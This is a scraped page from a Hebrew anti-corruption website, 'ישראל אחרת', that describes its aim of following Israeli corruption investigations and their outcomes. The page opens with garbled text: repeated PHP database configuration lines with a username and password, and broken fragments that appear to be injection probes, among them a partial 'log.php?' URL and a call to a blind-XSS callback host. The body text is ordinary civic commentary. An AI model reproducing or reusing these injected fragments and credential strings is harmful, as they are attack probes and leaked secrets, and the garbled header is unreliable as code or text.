$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ישראל אחרת
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

ישראל אחרת

התופעה

נגע השחיתות קנה לו אחיזה עמוקה ומדאיגה באורחות חיינו. הביורוקרטיה המסורבלת והמסואבת מייצרת קיצורי דרך פסולים המובילים לקניית שלטון ולתשלומי שוחד לפקידות הבכירה כדי לקבל בתמורה, קיצור הליכים, היתרים ואחוזי בנייה חריגים כדוגמת המיוחס ליזמים  בפרויקט הירושלמי "הולילנד".

אכיפה ופיקוח

יכולת אכיפה ופיקוח מוגבלים של רשויות האכיפה במדינת ישראל מכשירים את הקרקע לפריחתן של תופעות עברייניות לאור יום, ללא בושה וללא מורא מאימת הדין והשלטון. התופעה מתחילה מהאזרח הקטן, עוברת לפקיד הזוטר ומסתיימת לדאבון הלב בראש ממשלה ובנשיא מדינה.

רשויות החקירה הממלכתיות בליווי הפרקליטות עושות את שניתן באמצעים ובתשתיות העומדים לרשותן. זה אף פעם לא מספיק. נפח הפעילות העבריינית והשחיתות של עובדי ציבור עולה בהתמדה במהלך השנים. אמצעי התקשורת עושים מלאכתם ותורמים לחיטוי האקלים המזוהם של התרבות השלטונית בישראל.

דיווחים מהשטח

המדינה שלנו שטופה בחקירות. הציבור הרחב מגלה עניין רב במהלך החקירות ועוקב בדריכות אחר תוצאותיהן באמצעות כלי התקשורת השונים. מבול הדיווחים הכתובים והמצולמים מקשה על הקורא והצופה להבין ולעקוב מי נגד מי, מה החשד המיוחס לנחקרים מהן הראיות הנדרשות להגשת כתבי אישום, מה היו המלצות המשטרה, האם הוגשו כתבי אישום, מתי הוגשו, כיצד הסתיימו, הרשעה? זיכוי? עסקת טיעון? ועוד...

הגיע הזמן לעשות סדר בבלגן התקשורתי!  למען מטרה זו הקמנו את האתר ישראל אחרת באמצעותו נעקוב ונדווח על כל החקירות המתנהלות על ידי רשויות החקירה השונות ותוצאותיהן הסופיות. בניגוד לדפוס הדיווחים הסנסציוני והלא ממוקד, כנהוג באמצעי התקשורת, אנו נגיש לכם דיווח תמציתי ובהיר לכל נפש, שהוא פרי ניתוח ועיבוד של חוקרים ותיקים ומיומנים בתחום החקירות הפרטיות והממלכתיות.

גולש שיגלה עניין בחקירות שהתנהלו על ידי אחת מהרשויות החוקרות ושהובאו לידיעת הציבור, באמצעות כלי התקשורת, לא ידרש עוד לשוטט במנועי החיפוש שינפקו לו רשימה ארוכה ולא ממוינת של תוצאות החיפוש. אתר זה יחסוך מהגולשים את הגלישה לנתיב חיפוש מייגע בסבך הקישורים, המסמכים והאתרים הרבים השוכנים להם ברשת.

בנוסף למעקב השוטף אחר החקירות המתנהלות, אנו נעקוב ונדווח לכם הגולשים אודות חריגות ממנהל תקין, פלישות לקרקע פרטית, פגיעה באיכות הסביבה, השתלטות פיראטית על חופי רחצה ציבוריים, ובקיצור, כל מה שמריח רע, כל מה שהוא כשר אבל מסריח, כל מה שהוא עקום וחורג מהסטנדרטים שאנו רוצים לאמץ כדי לחיות במדינה מתוקנת, תרבותית ומתקדמת.

ישראל אחרת זו המדינה שאנו חפצים לחיות בה. יש מה לעשות והרבה. זה לא רק בידי שמים. זה בעיקר בידנו האזרחים.